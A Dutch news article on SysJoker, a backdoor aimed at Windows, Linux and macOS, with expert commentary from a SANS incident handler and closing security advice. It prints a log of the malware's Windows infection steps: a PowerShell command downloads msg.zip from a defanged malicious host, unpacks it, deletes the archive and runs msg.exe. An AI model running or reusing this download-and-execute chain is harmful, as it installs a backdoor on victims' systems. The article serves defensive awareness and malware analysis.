Nieuwe SysJoker-malware richt zich op Windows, Linux én MacOS

3 reacties

Malware is in opkomst. Het komt alleen zelden voor dat dit soort ongewenste programmatuur zich op meerdere besturingssystemen richt. Onderzoekers van Intezer hebben nu SysJoker ontdekt, malware dat zich op de drie belangrijkste besturingssystemen richt.

De onderzoekers denken dat de malware nieuw is en waarschijnlijk door een grotere organisatie is gemaakt. De malware kan zich voordoen als een systeemupdate, maar kan ook binnenkomen via een geinfecteerd npm-bestand. De uitvoerbare bestanden krijgen onder Windows en MacOS de extensie .ts, daarmee doet het zich voor als programma in de TypeScript-programmeertaal of een videostream. Wanneer het wordt gestart, zoekt het contact met een bestand dat op een Google Drive staat, in dat bestand vindt het de servers waarmee het beheer van de computer overgenomen kan worden. Tijdens de aanval worden de adressen van die servers veranderd om de detectie te bemoeilijken, 

Hoe gevaarlijk is SysJoker? We zochten contact met  de Belgische cybersecurityspecialist Xavier Mertens van Xameco, tevens incident behandelaar bij het SANS Internet Storm Center en ook doceert hij malware-analyse bij SANS.

Mertens: “SysJoker is een backdoor die onlangs is ontdekt. Dat betekent niet dat het nieuw is, het was waarschijnlijk al een aantal maanden actief. Het biedt ook niet veel nieuwe mogelijkheden, het grootste verschil is dat het geschikt is voor de drie belangrijkste besturingssystemen (Windows, Linux en MacOS). Hierdoor is het aantal potentiële slachtoffers groter. Het biedt technisch niets nieuws, het implementeert een achterdeur. Zodra een systeem is geinfecteerd, dan kan de aanvaller het beheer van het systeem overnemen en bijvoorbeeld programma’s uitvoeren, data kopiëren of andere zaken.

Ik denk niet dat SysJoke zelf erg gevaarlijk is. Het probleem is dat het een onderdeel is van het businessproces. Aanvallers infecteren computers met een achterdeur zoals SysJoke en verkopen vervolgens de toegang tot die deur op de zwarte markt. Dit is een gebruikelijke aanvalsmethode.

SysJoke werd niet eerder ontdekt, en ook vandaag wordt het door de meeste antivirussoftware niet ontdekt. Aanvallers gebruiken tegenwoordig technieken die niet door de standaardsoftware die door de meeste mensen worden gebruikt.

Mertens is even aan de gang gegaan met de malware: SysJoker haalt een bestand op van github[.]url-mini[.]com en hij zag dat er ook een aantal bestanden op het bestandssysteem werden gezet. "

Hieronder  krijg je inzicht in van de eerste stappen van de malware onder Windows:

• rundll32.exe 2708 "C:\Windows\System32\rundll32.exe" "C:\Users\user01\AppData\Local\Temp\recovery.dll",#1
• powershell.exe 2104 powershell.exe Invoke-WebRequest -Uri 'hxxps://github[.]url-mini[.]com/msg.zip' -OutFile 'C:\ProgramData\RecoverySystem\recoveryWindows.zip';Write-Output "Time taken : $((Get - Date).Subtract($start_time) ...(truncated)
• powershell.exe 1660 powershell.exe Expand-Archive -LiteralPath 'C:\ProgramData\RecoverySystem\recoveryWindows.zip' -DestinationPath 'C:\ProgramData\RecoverySystem'
• powershell.exe 2784 powershell.exe Remove-Item -Path 'C:\ProgramData\RecoverySystem\recoveryWindows.zip' -Force
• powershell.exe 548 powershell.exe start C:\ProgramData\RecoverySystem\msg.exe

Mertens besluit met een advies: “Mensen kunnen op dezelfde manier computers blijven gebruiken. Maar wel op hun hoede zijn en blijven. Open geen verdachte bestanden en klik niet zomaar op een link, zonder dat je zeker bent dat het een betrouwbare bron is. Installeer regelmatig updates, maar let op SysJoker kan zich voordoen als een systeemupdate."

Meer details vind je hier

 

Bronnen: Arstechnica, Intezer

« Vorig bericht Volgend bericht »
0